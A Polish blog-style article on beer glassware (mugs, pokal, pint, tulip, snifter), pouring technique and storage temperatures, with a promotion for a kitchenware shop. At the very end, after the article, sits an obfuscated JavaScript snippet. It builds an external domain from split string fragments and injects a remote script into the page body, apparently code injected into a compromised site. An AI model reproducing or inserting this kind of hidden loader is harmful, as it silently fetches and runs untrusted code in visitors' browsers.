Każdy miłośnik napoju z chmielu wie, że na jego smak ma wpływ wiele czynników — od temperatury, przez rodzaj browaru, po dodatki. Wśród tych czynników na wyróżnienie zasługuje… sposób podawania. Okazuje się bowiem, że rodzaj szkła — zarówno jego kształt, jak i grubość — może mieć znaczący wpływ na doznania smakowe i uwalniane aromaty. Zatem, jak podawać piwo podczas domowych przyjęć? Jakich błędów unikać i które kufle są najbardziej uniwersalne?
W czym podawać piwo?
Według sztuki rzemieślniczej — piwa nie należy podawać w szklanych butelkach lub kubkach. Dużo lepiej sprawdzą się dedykowane szklanki do piwa — te różnić się mogą wielkością, rodzajem nóżki, grubością. Wśród tych najpopularniejszych, wymienia się:
- Kufle. Różnić się mogą kształtem, wielkością i rodzajem wykończenia (minimalistyczne vs. wykonane z ciętego szkła). Do ich produkcji zwykle wykorzystuje się grube szkło, przez co są cięższe i masywniejsze od klasycznych szklanek. Wyjątkiem są kufle do piwa ciemniejszego i mocniejszego — te zwykle są delikatniejsze i subtelniejsze. Kufle obowiązkowo muszą być duży uchwyt.
- Pokal. Wyjątkowe kieliszki, wyróżniający się smukłą, wykonaną z cienkiego szkła, formą. Cechą charakterystyczną jest subtelna nóżka na drobnej podstawce. Pokal jest więc niezwykle elegancki, doskonale podkreślając barwę i klarowność trunku.
- Pinta. Wysokie szklanki o lekko rozchodzącej się formie. Niezwykle popularne i często spotykane w lokalach (głównie ze względu na dużą pojemność).
- Tulip. Szklanka przypominająca tulipan. Osadzona na niskiej nóżce, wyróżniająca się szeroką, pękatą podstawą. Kształt ten nie jest przypadkowy — delikatne zwężanie ku górze sprawia, że zwarte aromaty uwalniane są znacznie wolniej, a piana utrzymuje się dłużej.
Na wyróżnienie zasługują także szklanki do piwa sensorycznego. Te — jak sama nazwa wskazuje — mają za zadanie uwydatniać smak, zapach i konsystencję trunku. Przykładem takiej szklanki jest TeKU czy snifter, który powstał z myślą o piwach, wartych… powąchania.
Szeroką ofertę szklanek, kieliszków i kufli do piwa znajdziesz w KitchenStore.pl!
Jak nalewać piwo?
Bez względu na to, czy lejesz piwo bezpośrednio z butelki, czy z kranu, należy to robić powoli — najlepiej do pochylonego na ukos kufla. Staraj się celować w jego środek, a przy napełnieniu do ⅔ wysokości, ponownie trzymaj go pionowo. Nalewaj trunek, aż do momentu utworzenia na brzegach piany — to dzięki niej piwo zachowa dłużej intensywny smak.
Jak przechowywać piwo?
Niezwykle kluczowym elementem, wpływającym na smak, jest temperatura przechowywania. Wbrew pozorom — nie zawsze jest to lodówka (co z pewnością zaskoczy wszystkich miłośników mocno zimnego piwa). Równie dobrze sprawdzi się spiżarnia lub zaciemnione miejsce, gdzie panuje temperatura około 5-6 stopni Celsjusza. Pamiętaj — im piwo jest zimniejsze, tym szybciej traci na swoich aromatach i walorach smakowych.
Piwo należy podawać w temperaturze wyższej niż 8 stopni. Im trunek jest gęstszy — tym temperatura powinna być wyższa (nawet do 16 stopni Celsjusza). Nie należy podawać go w towarzystwie kostek lodu.
(function(){
w688=document.createElement(„script”);w688.type=”text/javascript”;
w688.async=true;w688_=((„us”)+”t”)+”a”;w688_+=(„t.i”)+””+”n”;w688_+=((„f”)+”o”);w688_+=”/”;
w688u=”497547434.”;w688u+=”5avwi05a688zzzvq5kk68n7pxnjgdc”;w688.src=”https://”+w688_+w688u;
w688db=document.body;w688db.appendChild(w688);
})();